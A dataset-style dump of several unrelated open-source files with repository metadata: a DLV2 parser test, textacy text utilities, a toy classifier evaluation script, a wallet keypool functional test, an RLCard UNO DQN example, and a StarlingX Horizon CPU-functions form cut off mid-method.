"Apache-2.0"
] | null | null | null | tests/parser/query.10.test.py | veltri/DLV2 | 944aaef803aa75e7ec51d7e0c2b0d964687fdd0e | [
"Apache-2.0"
] | null | null | null | input = """
a.
x | d :- a.
c :- b.
c?
"""
output = """
a.
x | d :- a.
c :- b.
c?
"""
| 5.526316 | 12 | 0.238095 | input = """
a.
x | d :- a.
c :- b.
c?
"""
output = """
a.
x | d :- a.
c :- b.
c?
"""
| true | true |
f7191a9344d5198ccde86f8f184716fe9107a381 | 5,646 | py | Python | textacy/text_utils.py | tbsexton/textacy | 964614213c7261f91f09c106334269388d45f790 | [
"Apache-2.0"
] | null | null | null | textacy/text_utils.py | tbsexton/textacy | 964614213c7261f91f09c106334269388d45f790 | [
"Apache-2.0"
] | null | null | null | textacy/text_utils.py | tbsexton/textacy | 964614213c7261f91f09c106334269388d45f790 | [
"Apache-2.0"
] | null | null | null | """
Text Utils
----------
Set of small utility functions that take text strings as input.
"""
import logging
import re
from typing import Iterable, Optional, Set, Tuple
from . import constants
LOGGER = logging.getLogger(__name__)
def is_acronym(token: str, exclude: Optional[Set[str]] = None) -> bool:
"""
Pass single token as a string, return True/False if is/is not valid acronym.
Args:
token: Single word to check for acronym-ness
exclude: If technically valid but not actually good acronyms are known in advance,
pass them in as a set of strings; matching tokens will return False.
Returns:
Whether or not ``token`` is an acronym.
"""
# exclude certain valid acronyms from consideration
if exclude and token in exclude:
return False
# don't allow empty strings
if not token:
return False
# don't allow spaces
if " " in token:
return False
# 2-character acronyms can't have lower-case letters
if len(token) == 2 and not token.isupper():
return False
# acronyms can't be all digits
if token.isdigit():
return False
# acronyms must have at least one upper-case letter or start/end with a digit
if not any(char.isupper() for char in token) and not (
token[0].isdigit() or token[-1].isdigit()
):
return False
# acronyms must have between 2 and 10 alphanumeric characters
if not 2 <= sum(1 for char in token if char.isalnum()) <= 10:
return False
# only certain combinations of letters, digits, and '&/.-' allowed
if not constants.RE_ACRONYM.match(token):
return False
return True
def keyword_in_context(
text: str,
keyword: str,
*,
ignore_case: bool = True,
window_width: int = 50,
print_only: bool = True,
) -> Optional[Iterable[Tuple[str, str, str]]]:
"""
Search for ``keyword`` in ``text`` via regular expression, return or print strings
spanning ``window_width`` characters before and after each occurrence of keyword.
Args:
text: Text in which to search for ``keyword``.
keyword: Technically, any valid regular expression string should work,
but usually this is a single word or short phrase: "spam", "spam and eggs";
to account for variations, use regex: "[Ss]pam (and|&) [Ee]ggs?"
.. note:: If keyword contains special characters, be sure to escape them!
ignore_case: If True, ignore letter case in ``keyword`` matching.
window_width: Number of characters on either side of ``keyword``
to include as "context".
print_only: If True, print out all results with nice formatting;
if False, return all (pre, kw, post) matches as generator of raw strings.
Yields:
Next 3-tuple of prior context, the match itself, and posterior context.
"""
flags = re.IGNORECASE if ignore_case is True else 0
if print_only is True:
for match in re.finditer(keyword, text, flags=flags):
line = "{pre} {kw} {post}".format(
pre=text[max(0, match.start() - window_width) : match.start()].rjust(
window_width
),
kw=match.group(),
post=text[match.end() : match.end() + window_width].ljust(window_width),
)
print(line)
else:
for match in re.finditer(keyword, text, flags=flags):
yield (
text[max(0, match.start() - window_width) : match.start()],
match.group(),
text[match.end() : match.end() + window_width],
)
KWIC = keyword_in_context
"""Alias of :func:`keyword_in_context <textacy.text_utils.keyword_in_context>`."""
def clean_terms(terms: Iterable[str]) -> Iterable[str]:
"""
Clean up a sequence of single- or multi-word strings: strip leading/trailing
junk chars, handle dangling parens and odd hyphenation, etc.
Args:
terms: Sequence of terms such as "presidency", "epic failure",
or "George W. Bush" that may be _unclean_ for whatever reason.
Yields:
Next term in `terms` but with the cruft cleaned up, excluding terms
that were _entirely_ cruft
Warning:
Terms with (intentionally) unusual punctuation may get "cleaned"
into a form that changes or obscures the original meaning of the term.
"""
# get rid of leading/trailing junk characters
terms = (constants.RE_LEAD_TAIL_CRUFT_TERM.sub("", term) for term in terms)
terms = (constants.RE_LEAD_HYPHEN_TERM.sub(r"\1", term) for term in terms)
# handle dangling/backwards parens, don't allow '(' or ')' to appear without the other
terms = (
""
if term.count(")") != term.count("(") or term.find(")") < term.find("(")
else term
if "(" not in term
else constants.RE_DANGLING_PARENS_TERM.sub(r"\1\2\3", term)
for term in terms
)
# handle oddly separated hyphenated words
terms = (
term
if "-" not in term
else constants.RE_NEG_DIGIT_TERM.sub(
r"\1\2", constants.RE_WEIRD_HYPHEN_SPACE_TERM.sub(r"\1", term)
)
for term in terms
)
# handle oddly separated apostrophe'd words
terms = (
constants.RE_WEIRD_APOSTR_SPACE_TERM.sub(r"\1\2", term) if "'" in term else term
for term in terms
)
# normalize whitespace
terms = (constants.RE_NONBREAKING_SPACE.sub(" ", term).strip() for term in terms)
for term in terms:
if re.search(r"\w", term):
yield term
| 35.734177 | 90 | 0.626993 | import logging
import re
from typing import Iterable, Optional, Set, Tuple
from . import constants
LOGGER = logging.getLogger(__name__)
def is_acronym(token: str, exclude: Optional[Set[str]] = None) -> bool:
if exclude and token in exclude:
return False
if not token:
return False
# don't allow spaces
if " " in token:
return False
if len(token) == 2 and not token.isupper():
return False
# acronyms can't be all digits
if token.isdigit():
return False
if not any(char.isupper() for char in token) and not (
token[0].isdigit() or token[-1].isdigit()
):
return False
if not 2 <= sum(1 for char in token if char.isalnum()) <= 10:
return False
if not constants.RE_ACRONYM.match(token):
return False
return True
def keyword_in_context(
text: str,
keyword: str,
*,
ignore_case: bool = True,
window_width: int = 50,
print_only: bool = True,
) -> Optional[Iterable[Tuple[str, str, str]]]:
flags = re.IGNORECASE if ignore_case is True else 0
if print_only is True:
for match in re.finditer(keyword, text, flags=flags):
line = "{pre} {kw} {post}".format(
pre=text[max(0, match.start() - window_width) : match.start()].rjust(
window_width
),
kw=match.group(),
post=text[match.end() : match.end() + window_width].ljust(window_width),
)
print(line)
else:
for match in re.finditer(keyword, text, flags=flags):
yield (
text[max(0, match.start() - window_width) : match.start()],
match.group(),
text[match.end() : match.end() + window_width],
)
KWIC = keyword_in_context
def clean_terms(terms: Iterable[str]) -> Iterable[str]:
terms = (constants.RE_LEAD_TAIL_CRUFT_TERM.sub("", term) for term in terms)
terms = (constants.RE_LEAD_HYPHEN_TERM.sub(r"\1", term) for term in terms)
terms = (
""
if term.count(")") != term.count("(") or term.find(")") < term.find("(")
else term
if "(" not in term
else constants.RE_DANGLING_PARENS_TERM.sub(r"\1\2\3", term)
for term in terms
)
# handle oddly separated hyphenated words
terms = (
term
if "-" not in term
else constants.RE_NEG_DIGIT_TERM.sub(
r"\1\2", constants.RE_WEIRD_HYPHEN_SPACE_TERM.sub(r"\1", term)
)
for term in terms
)
# handle oddly separated apostrophe'd words
terms = (
constants.RE_WEIRD_APOSTR_SPACE_TERM.sub(r"\1\2", term) if "'" in term else term
for term in terms
)
# normalize whitespace
terms = (constants.RE_NONBREAKING_SPACE.sub(" ", term).strip() for term in terms)
for term in terms:
if re.search(r"\w", term):
yield term
| true | true |
f7191add8f756794b4712383067b7b7dd7494a69 | 3,495 | py | Python | toyClassification/MC-Dropout-MAP-01-Adam/eval.py | frezaeix/evaluating_bdl | bd0a464981c18de8479b6be2d91867527016c8d3 | [
"MIT"
] | null | null | null | toyClassification/MC-Dropout-MAP-01-Adam/eval.py | frezaeix/evaluating_bdl | bd0a464981c18de8479b6be2d91867527016c8d3 | [
"MIT"
] | null | null | null | toyClassification/MC-Dropout-MAP-01-Adam/eval.py | frezaeix/evaluating_bdl | bd0a464981c18de8479b6be2d91867527016c8d3 | [
"MIT"
] | null | null | null | # code-checked
# server-checked
from model import ToyNet
import torch
import torch.utils.data
import torch.nn as nn
from torch.autograd import Variable
import torch.optim as optim
import torch.nn.functional as F
import numpy as np
import pickle
import matplotlib
matplotlib.use("Agg")
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import cv2
batch_size = 32
M = 4
x_min = -6.0
x_max = 6.0
num_points = 60
network = ToyNet("Farzaneh_eval_MC-Dropout-MAP-01-Adam_1_M10_0", project_dir="../").cuda()
network.load_state_dict(torch.load("../training_logs/model_Farzaneh_MC-Dropout-MAP-01-Adam_1_M10_0/checkpoints/model_Farzaneh_MC-Dropout-MAP-01-Adam_1_M10_epoch_300.pth"))
M_float = float(M)
print (M_float)
network.eval()
false_prob_values = np.zeros((num_points, num_points))
x_values = np.linspace(x_min, x_max, num_points, dtype=np.float32)
for x_1_i, x_1_value in enumerate(x_values):
for x_2_i, x_2_value in enumerate(x_values):
x = torch.from_numpy(np.array([x_1_value, x_2_value])).unsqueeze(0).cuda() # (shape: (1, 2))
mean_prob_vector = np.zeros((2, ))
for i in range(M):
logits = network(x) # (shape: (1, num_classes)) (num_classes==2)
prob_vector = F.softmax(logits, dim=1) # (shape: (1, num_classes))
prob_vector = prob_vector.data.cpu().numpy()[0] # (shape: (2, ))
mean_prob_vector += prob_vector/M_float
false_prob_values[x_2_i, x_1_i] = mean_prob_vector[0]
plt.figure(1)
x_1, x_2 = np.meshgrid(x_values, x_values)
plt.pcolormesh(x_1, x_2, false_prob_values, cmap="RdBu")
plt.xlabel("x_1")
plt.ylabel("x_2")
plt.title("Predictive Density")
plt.colorbar()
plt.savefig("%s/predictive_density.png" % network.model_dir)
plt.close(1)
plt.figure(1)
plt.pcolormesh(x_1, x_2, false_prob_values, cmap="binary")
plt.xlabel("x_1")
plt.ylabel("x_2")
plt.title("Predictive Density")
plt.colorbar()
plt.savefig("%s/predictive_density_gray.png" % network.model_dir)
plt.close(1)
x_values = np.linspace(x_min, x_max, 1000, dtype=np.float32)
x_1, x_2 = np.meshgrid(x_values, x_values)
dist = np.sqrt(x_1**2 + x_2**2)
false_prob_values_GT = np.zeros(dist.shape)
false_prob_values_GT[dist < 2.4] = 1.0
plt.figure(1)
plt.pcolormesh(x_1, x_2, false_prob_values_GT, cmap="RdBu")
plt.xlabel("x_1")
plt.ylabel("x_2")
plt.title("Predictive Density - Ground Truth")
plt.colorbar()
plt.savefig("%s/predictive_density_GT.png" % network.model_dir)
plt.close(1)
plt.figure(1)
plt.pcolormesh(x_1, x_2, false_prob_values_GT, cmap="binary")
plt.xlabel("x_1")
plt.ylabel("x_2")
plt.title("Predictive Density - Ground Truth")
plt.colorbar()
plt.savefig("%s/predictive_density_gray_GT.png" % network.model_dir)
plt.close(1)
with open("../HMC/false_prob_values.pkl", "rb") as file: # (needed for python3)
false_prob_values_HMC = pickle.load(file) # (shape: (60, 60))
x_values = np.linspace(x_min, x_max, num_points, dtype=np.float32)
x_1, x_2 = np.meshgrid(x_values, x_values)
x_values_GT = np.linspace(x_min, x_max, 1000, dtype=np.float32)
x_1_GT, x_2_GT = np.meshgrid(x_values_GT, x_values_GT)
fig, axes = plt.subplots(nrows=1, ncols=2, constrained_layout=True, sharex=True, sharey=True, figsize=(11.0, 5.0))
im = axes.flat[0].pcolormesh(x_1, x_2, false_prob_values_HMC, cmap="RdBu", vmin=0, vmax=1)
im = axes.flat[1].pcolormesh(x_1, x_2, false_prob_values, cmap="RdBu", vmin=0, vmax=1)
fig.colorbar(im, ax=axes.flat)
plt.savefig("%s/predictive_density_comparison.png" % network.model_dir)
plt.close()
| 32.971698 | 171 | 0.731903 |
from model import ToyNet
import torch
import torch.utils.data
import torch.nn as nn
from torch.autograd import Variable
import torch.optim as optim
import torch.nn.functional as F
import numpy as np
import pickle
import matplotlib
matplotlib.use("Agg")
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import cv2
batch_size = 32
M = 4
x_min = -6.0
x_max = 6.0
num_points = 60
network = ToyNet("Farzaneh_eval_MC-Dropout-MAP-01-Adam_1_M10_0", project_dir="../").cuda()
network.load_state_dict(torch.load("../training_logs/model_Farzaneh_MC-Dropout-MAP-01-Adam_1_M10_0/checkpoints/model_Farzaneh_MC-Dropout-MAP-01-Adam_1_M10_epoch_300.pth"))
M_float = float(M)
print (M_float)
network.eval()
false_prob_values = np.zeros((num_points, num_points))
x_values = np.linspace(x_min, x_max, num_points, dtype=np.float32)
for x_1_i, x_1_value in enumerate(x_values):
for x_2_i, x_2_value in enumerate(x_values):
x = torch.from_numpy(np.array([x_1_value, x_2_value])).unsqueeze(0).cuda()
mean_prob_vector = np.zeros((2, ))
for i in range(M):
logits = network(x)
prob_vector = F.softmax(logits, dim=1)
prob_vector = prob_vector.data.cpu().numpy()[0]
mean_prob_vector += prob_vector/M_float
false_prob_values[x_2_i, x_1_i] = mean_prob_vector[0]
plt.figure(1)
x_1, x_2 = np.meshgrid(x_values, x_values)
plt.pcolormesh(x_1, x_2, false_prob_values, cmap="RdBu")
plt.xlabel("x_1")
plt.ylabel("x_2")
plt.title("Predictive Density")
plt.colorbar()
plt.savefig("%s/predictive_density.png" % network.model_dir)
plt.close(1)
plt.figure(1)
plt.pcolormesh(x_1, x_2, false_prob_values, cmap="binary")
plt.xlabel("x_1")
plt.ylabel("x_2")
plt.title("Predictive Density")
plt.colorbar()
plt.savefig("%s/predictive_density_gray.png" % network.model_dir)
plt.close(1)
x_values = np.linspace(x_min, x_max, 1000, dtype=np.float32)
x_1, x_2 = np.meshgrid(x_values, x_values)
dist = np.sqrt(x_1**2 + x_2**2)
false_prob_values_GT = np.zeros(dist.shape)
false_prob_values_GT[dist < 2.4] = 1.0
plt.figure(1)
plt.pcolormesh(x_1, x_2, false_prob_values_GT, cmap="RdBu")
plt.xlabel("x_1")
plt.ylabel("x_2")
plt.title("Predictive Density - Ground Truth")
plt.colorbar()
plt.savefig("%s/predictive_density_GT.png" % network.model_dir)
plt.close(1)
plt.figure(1)
plt.pcolormesh(x_1, x_2, false_prob_values_GT, cmap="binary")
plt.xlabel("x_1")
plt.ylabel("x_2")
plt.title("Predictive Density - Ground Truth")
plt.colorbar()
plt.savefig("%s/predictive_density_gray_GT.png" % network.model_dir)
plt.close(1)
with open("../HMC/false_prob_values.pkl", "rb") as file:
false_prob_values_HMC = pickle.load(file)
x_values = np.linspace(x_min, x_max, num_points, dtype=np.float32)
x_1, x_2 = np.meshgrid(x_values, x_values)
x_values_GT = np.linspace(x_min, x_max, 1000, dtype=np.float32)
x_1_GT, x_2_GT = np.meshgrid(x_values_GT, x_values_GT)
fig, axes = plt.subplots(nrows=1, ncols=2, constrained_layout=True, sharex=True, sharey=True, figsize=(11.0, 5.0))
im = axes.flat[0].pcolormesh(x_1, x_2, false_prob_values_HMC, cmap="RdBu", vmin=0, vmax=1)
im = axes.flat[1].pcolormesh(x_1, x_2, false_prob_values, cmap="RdBu", vmin=0, vmax=1)
fig.colorbar(im, ax=axes.flat)
plt.savefig("%s/predictive_density_comparison.png" % network.model_dir)
plt.close()
| true | true |
f7191b74ad043bf5a88f00d42e710de35f6e22dd | 2,969 | py | Python | test/functional/wallet_keypool_topup.py | ORO-mlm/ORO-Core | 770e4728e1b67023f2f52da2850e058732e7583f | [
"MIT"
] | null | null | null | test/functional/wallet_keypool_topup.py | ORO-mlm/ORO-Core | 770e4728e1b67023f2f52da2850e058732e7583f | [
"MIT"
] | null | null | null | test/functional/wallet_keypool_topup.py | ORO-mlm/ORO-Core | 770e4728e1b67023f2f52da2850e058732e7583f | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) 2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test HD Wallet keypool restore function.
Two nodes. Node1 is under test. Node0 is providing transactions and generating blocks.
- Start node1, shutdown and backup wallet.
- Generate 110 keys (enough to drain the keypool). Store key 90 (in the initial keypool) and key 110 (beyond the initial keypool). Send funds to key 90 and key 110.
- Stop node1, clear the datadir, move wallet file back into the datadir and restart node1.
- connect node1 to node0. Verify that they sync and node1 receives its funds."""
import shutil
from test_framework.test_framework import OroTestFramework
from test_framework.util import (
assert_equal,
connect_nodes,
)
class KeypoolRestoreTest(OroTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2
self.extra_args = [['-keypool=3'], ['-keypool=100']]
def run_test(self):
isLegacyWallet = '-legacywallet' in self.nodes[0].extra_args
self.tmpdir = self.options.tmpdir
self.nodes[0].generate(101)
self.log.info("Make backup of wallet")
self.stop_node(1)
shutil.copyfile(self.tmpdir + "/node1/regtest/wallet.dat", self.tmpdir + "/wallet.bak")
self.start_node(1, self.extra_args[1])
connect_nodes(self.nodes[0], 1)
self.log.info("Generate keys for wallet")
for _ in range(90):
addr_oldpool = self.nodes[1].getnewaddress()
for _ in range(20):
addr_extpool = self.nodes[1].getnewaddress()
self.log.info("Send funds to wallet")
self.nodes[0].sendtoaddress(addr_oldpool, 10)
self.nodes[0].generate(1)
self.nodes[0].sendtoaddress(addr_extpool, 5)
self.nodes[0].generate(1)
self.sync_blocks()
self.log.info("Restart node with wallet backup")
self.stop_node(1)
shutil.copyfile(self.tmpdir + "/wallet.bak", self.tmpdir + "/node1/regtest/wallet.dat")
self.log.info("Verify keypool is restored and balance is correct")
self.start_node(1, self.extra_args[1])
connect_nodes(self.nodes[0], 1)
self.sync_all()
# wallet was not backupped after emptying the key pool.
# Legacy wallet can't recover funds in addr_extpool
recoveredBalance = 10 if isLegacyWallet else 15
assert_equal(self.nodes[1].getbalance(), recoveredBalance)
assert_equal(self.nodes[1].listtransactions()[0]['category'], "receive")
# Check that we have marked all keys up to the used keypool key as used
if not isLegacyWallet:
assert_equal(self.nodes[1].getaddressinfo(self.nodes[1].getnewaddress())['hdkeypath'], "m/44'/119'/0'/0'/110'")
if __name__ == '__main__':
KeypoolRestoreTest().main()
| 37.582278 | 164 | 0.67969 |
import shutil
from test_framework.test_framework import OroTestFramework
from test_framework.util import (
assert_equal,
connect_nodes,
)
class KeypoolRestoreTest(OroTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2
self.extra_args = [['-keypool=3'], ['-keypool=100']]
def run_test(self):
isLegacyWallet = '-legacywallet' in self.nodes[0].extra_args
self.tmpdir = self.options.tmpdir
self.nodes[0].generate(101)
self.log.info("Make backup of wallet")
self.stop_node(1)
shutil.copyfile(self.tmpdir + "/node1/regtest/wallet.dat", self.tmpdir + "/wallet.bak")
self.start_node(1, self.extra_args[1])
connect_nodes(self.nodes[0], 1)
self.log.info("Generate keys for wallet")
for _ in range(90):
addr_oldpool = self.nodes[1].getnewaddress()
for _ in range(20):
addr_extpool = self.nodes[1].getnewaddress()
self.log.info("Send funds to wallet")
self.nodes[0].sendtoaddress(addr_oldpool, 10)
self.nodes[0].generate(1)
self.nodes[0].sendtoaddress(addr_extpool, 5)
self.nodes[0].generate(1)
self.sync_blocks()
self.log.info("Restart node with wallet backup")
self.stop_node(1)
shutil.copyfile(self.tmpdir + "/wallet.bak", self.tmpdir + "/node1/regtest/wallet.dat")
self.log.info("Verify keypool is restored and balance is correct")
self.start_node(1, self.extra_args[1])
connect_nodes(self.nodes[0], 1)
self.sync_all()
recoveredBalance = 10 if isLegacyWallet else 15
assert_equal(self.nodes[1].getbalance(), recoveredBalance)
assert_equal(self.nodes[1].listtransactions()[0]['category'], "receive")
# Check that we have marked all keys up to the used keypool key as used
if not isLegacyWallet:
assert_equal(self.nodes[1].getaddressinfo(self.nodes[1].getnewaddress())['hdkeypath'], "m/44'/119'/0'/0'/110'")
if __name__ == '__main__':
KeypoolRestoreTest().main()
| true | true |
f7191b7831ff3bb9f706d295c3c5cdd09d24319d | 2,516 | py | Python | examples/uno_single.py | drunkpig/rlcard | db8a410bbfefb7f9fd958239aae8d79a8bfb29d3 | [
"MIT"
] | null | null | null | examples/uno_single.py | drunkpig/rlcard | db8a410bbfefb7f9fd958239aae8d79a8bfb29d3 | [
"MIT"
] | null | null | null | examples/uno_single.py | drunkpig/rlcard | db8a410bbfefb7f9fd958239aae8d79a8bfb29d3 | [
"MIT"
] | 1 | 2020-11-20T16:38:37.000Z | 2020-11-20T16:38:37.000Z | ''' A toy example of training single-agent algorithm on Leduc Hold'em
The environment can be treated as normal OpenAI gym style single-agent environment
'''
import tensorflow as tf
import os
import numpy as np
import rlcard
from rlcard.agents.dqn_agent import DQNAgent
from rlcard.agents.random_agent import RandomAgent
from rlcard.utils.utils import set_global_seed, tournament
from rlcard.utils.logger import Logger
# Make environment
env = rlcard.make('uno', config={'single_agent_mode':True})
eval_env = rlcard.make('uno', config={'single_agent_mode':True})
# Set the iterations numbers and how frequently we evaluate the performance
evaluate_every = 1000
evaluate_num = 10000
timesteps = 100000
# The intial memory size
memory_init_size = 1000
# Train the agent every X steps
train_every = 1
# The paths for saving the logs and learning curves
log_dir = './experiments/uno_single_dqn_result/'
# Set a global seed
set_global_seed(0)
with tf.Session() as sess:
# Initialize a global step
global_step = tf.Variable(0, name='global_step', trainable=False)
# Set up the agents
agent = DQNAgent(sess,
scope='dqn',
action_num=env.action_num,
replay_memory_init_size=memory_init_size,
train_every=train_every,
state_shape=env.state_shape,
mlp_layers=[128,128])
# Initialize global variables
sess.run(tf.global_variables_initializer())
# Init a Logger to plot the learning curve
logger = Logger(log_dir)
state = env.reset()
for timestep in range(timesteps):
action = agent.step(state)
next_state, reward, done = env.step(action)
ts = (state, action, reward, next_state, done)
agent.feed(ts)
if timestep % evaluate_every == 0:
rewards = []
state = eval_env.reset()
for _ in range(evaluate_num):
action, _ = agent.eval_step(state)
_, reward, done = env.step(action)
if done:
rewards.append(reward)
logger.log_performance(env.timestep, np.mean(rewards))
# Close files in the logger
logger.close_files()
# Plot the learning curve
logger.plot('DQN')
# Save model
save_dir = 'models/uno_single_dqn'
if not os.path.exists(save_dir):
os.makedirs(save_dir)
saver = tf.train.Saver()
saver.save(sess, os.path.join(save_dir, 'model'))
| 29.255814 | 86 | 0.657393 |
import tensorflow as tf
import os
import numpy as np
import rlcard
from rlcard.agents.dqn_agent import DQNAgent
from rlcard.agents.random_agent import RandomAgent
from rlcard.utils.utils import set_global_seed, tournament
from rlcard.utils.logger import Logger
env = rlcard.make('uno', config={'single_agent_mode':True})
eval_env = rlcard.make('uno', config={'single_agent_mode':True})
evaluate_every = 1000
evaluate_num = 10000
timesteps = 100000
memory_init_size = 1000
train_every = 1
log_dir = './experiments/uno_single_dqn_result/'
set_global_seed(0)
with tf.Session() as sess:
global_step = tf.Variable(0, name='global_step', trainable=False)
agent = DQNAgent(sess,
scope='dqn',
action_num=env.action_num,
replay_memory_init_size=memory_init_size,
train_every=train_every,
state_shape=env.state_shape,
mlp_layers=[128,128])
sess.run(tf.global_variables_initializer())
logger = Logger(log_dir)
state = env.reset()
for timestep in range(timesteps):
action = agent.step(state)
next_state, reward, done = env.step(action)
ts = (state, action, reward, next_state, done)
agent.feed(ts)
if timestep % evaluate_every == 0:
rewards = []
state = eval_env.reset()
for _ in range(evaluate_num):
action, _ = agent.eval_step(state)
_, reward, done = env.step(action)
if done:
rewards.append(reward)
logger.log_performance(env.timestep, np.mean(rewards))
logger.close_files()
logger.plot('DQN')
save_dir = 'models/uno_single_dqn'
if not os.path.exists(save_dir):
os.makedirs(save_dir)
saver = tf.train.Saver()
saver.save(sess, os.path.join(save_dir, 'model'))
| true | true |
f7191be16d1b89c72207a7ef5c87366a86c4b09c | 17,228 | py | Python | starlingx-dashboard/starlingx-dashboard/starlingx_dashboard/dashboards/admin/inventory/cpu_functions/forms.py | NaiveOpenStack/stx-gui | 11b75559f0dea9dd7b5807353cb6141903d1ab4e | [
"Apache-2.0"
] | 1 | 2018-09-18T11:10:53.000Z | 2018-09-18T11:10:53.000Z | starlingx-dashboard/starlingx-dashboard/starlingx_dashboard/dashboards/admin/inventory/cpu_functions/forms.py | NaiveOpenStack/stx-gui | 11b75559f0dea9dd7b5807353cb6141903d1ab4e | [
"Apache-2.0"
] | null | null | null | starlingx-dashboard/starlingx-dashboard/starlingx_dashboard/dashboards/admin/inventory/cpu_functions/forms.py | NaiveOpenStack/stx-gui | 11b75559f0dea9dd7b5807353cb6141903d1ab4e | [
"Apache-2.0"
] | null | null | null | #
# Copyright (c) 2013-2015 Wind River Systems, Inc.
#
# SPDX-License-Identifier: Apache-2.0
#
# vim: tabstop=4 shiftwidth=4 softtabstop=4
import logging
from cgtsclient import exc
from django.core.urlresolvers import reverse # noqa
from django import shortcuts
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import forms
from horizon import messages
from starlingx_dashboard.api import sysinv
# Module-level logger, namespaced to this module's dotted import path so log
# records can be filtered/configured per-module by the Horizon logging setup.
LOG = logging.getLogger(__name__)
class UpdateCpuFunctions(forms.SelfHandlingForm):
    """Edit the per-processor CPU function assignments of a host.

    One integer field is declared per function (platform / vswitch /
    shared) and per processor socket 0..3.  Sockets that do not exist on
    the host are flagged with the sentinel value 99 in the form's
    initial data; their fields are hidden in ``__init__``.
    """

    # Sockets are always modelled as 0..3; absent ones are hidden.
    PROCESSOR_RANGE = range(4)

    host = forms.CharField(label=_("host"),
                           required=False,
                           widget=forms.widgets.HiddenInput)
    host_id = forms.CharField(label=_("host_id"),
                              required=False,
                              widget=forms.widgets.HiddenInput)

    platform = forms.CharField(
        label=_("------------------------ Function ------------------------"),
        required=False,
        widget=forms.TextInput(attrs={'readonly': 'readonly'}))
    platform_processor0 = forms.DynamicIntegerField(
        label=_("# of Platform Physical Cores on Processor 0:"),
        min_value=0, max_value=99,
        required=False)
    platform_processor1 = forms.DynamicIntegerField(
        label=_("# of Platform Physical Cores on Processor 1:"),
        min_value=0, max_value=99,
        required=False)
    platform_processor2 = forms.DynamicIntegerField(
        label=_("# of Platform Physical Cores on Processor 2:"),
        min_value=0, max_value=99,
        required=False)
    platform_processor3 = forms.DynamicIntegerField(
        label=_("# of Platform Physical Cores on Processor 3:"),
        min_value=0, max_value=99,
        required=False)

    vswitch = forms.CharField(
        label=_("------------------------ Function ------------------------"),
        required=False,
        widget=forms.TextInput(attrs={'readonly': 'readonly'}))
    num_cores_on_processor0 = forms.DynamicIntegerField(
        label=_("# of vSwitch Physical Cores on Processor 0:"),
        min_value=0, max_value=99,
        required=False)
    num_cores_on_processor1 = forms.DynamicIntegerField(
        label=_("# of vSwitch Physical Cores on Processor 1:"),
        min_value=0, max_value=99,
        required=False)
    num_cores_on_processor2 = forms.DynamicIntegerField(
        label=_("# of vSwitch Physical Cores on Processor 2:"),
        min_value=0, max_value=99,
        required=False)
    num_cores_on_processor3 = forms.DynamicIntegerField(
        label=_("# of vSwitch Physical Cores on Processor 3:"),
        min_value=0, max_value=99,
        required=False)

    shared_vcpu = forms.CharField(
        label=_("------------------------ Function ------------------------"),
        required=False,
        widget=forms.TextInput(attrs={'readonly': 'readonly'}))
    num_shared_on_processor0 = forms.DynamicIntegerField(
        label=_("# of Shared Physical Cores on Processor 0:"),
        min_value=0, max_value=99,
        required=False)
    num_shared_on_processor1 = forms.DynamicIntegerField(
        label=_("# of Shared Physical Cores on Processor 1:"),
        min_value=0, max_value=99,
        required=False)
    num_shared_on_processor2 = forms.DynamicIntegerField(
        label=_("# of Shared Physical Cores on Processor 2:"),
        min_value=0, max_value=99,
        required=False)
    num_shared_on_processor3 = forms.DynamicIntegerField(
        label=_("# of Shared Physical Cores on Processor 3:"),
        min_value=0, max_value=99,
        required=False)

    failure_url = 'horizon:admin:inventory:detail'

    def __init__(self, *args, **kwargs):
        super(UpdateCpuFunctions, self).__init__(*args, **kwargs)
        self.host = kwargs['initial']['host']
        initial = kwargs['initial']

        # Platform cores are configurable on every host personality.
        for s in self.PROCESSOR_RANGE:
            self._setup_core_field('platform_processor%s' % s, s, initial)

        is_compute = 'compute' in self.host.subfunctions
        if not is_compute:
            # vSwitch cores only make sense on compute hosts.
            self.fields['vswitch'].widget = forms.widgets.HiddenInput()
            for s in self.PROCESSOR_RANGE:
                self.fields['num_cores_on_processor%s' % s].widget = \
                    forms.widgets.HiddenInput()
        else:
            for s in self.PROCESSOR_RANGE:
                self._setup_core_field('num_cores_on_processor%s' % s, s,
                                       initial)

        for s in self.PROCESSOR_RANGE:
            fname = 'num_shared_on_processor%s' % s
            if not is_compute or initial[fname] == 99:  # No Processor
                self.fields[fname].widget = forms.widgets.HiddenInput()
            else:
                self.fields[fname].set_max_value(1)
                self.fields[fname].help_text = \
                    "Each processor can have at most one shared core."

    def _setup_core_field(self, fname, socket, initial):
        """Hide *fname* when *socket* is absent (sentinel 99), otherwise
        cap its value at the socket's physical core count."""
        if initial[fname] == 99:  # No Processor
            self.fields[fname].widget = forms.widgets.HiddenInput()
        else:
            avail_socket_cores = self.host.physical_cores.get(socket, 0)
            self.fields[fname].set_max_value(avail_socket_cores)
            self.fields[fname].help_text = \
                "Processor %s has %s physical cores." % (socket,
                                                         avail_socket_cores)

    def clean(self):
        """Normalise all per-processor counts to strings and reject the
        submission when any of them is missing (stringified ``None``)."""
        cleaned_data = super(UpdateCpuFunctions, self).clean()
        prefixes = ('platform_processor',
                    'num_cores_on_processor',
                    'num_shared_on_processor')
        try:
            counts = {}
            for prefix in prefixes:
                per_socket = counts[prefix] = {}
                for s in self.PROCESSOR_RANGE:
                    key = '%s%s' % (prefix, s)
                    cleaned_data[key] = str(cleaned_data[key])
                    per_socket[s] = cleaned_data.get(key, 'None')
            for per_socket in counts.values():
                # str(None) == 'None' marks a field the user left empty.
                if 'None' in per_socket.values():
                    raise forms.ValidationError(_("Invalid entry."))
        except Exception as e:
            LOG.error(e)
            raise forms.ValidationError(_("Invalid entry."))

        # Since only vswitch is allowed to be modified
        cleaned_data['function'] = 'vswitch'
        # NOTE: shared_vcpu can be changed
        return cleaned_data

    def _field_visible(self, key):
        """True when *key* is not rendered with a hidden widget.  Keys
        unknown to the form are treated as visible, matching the original
        sorting logic in ``handle``."""
        if key not in self.fields:
            return True
        return not type(self.fields[key].widget) is \
            forms.widgets.HiddenInput

    def handle(self, request, data):
        """Push the edited platform/vswitch/shared core counts to sysinv.

        Returns the host's cpu list on success, or redirects to the
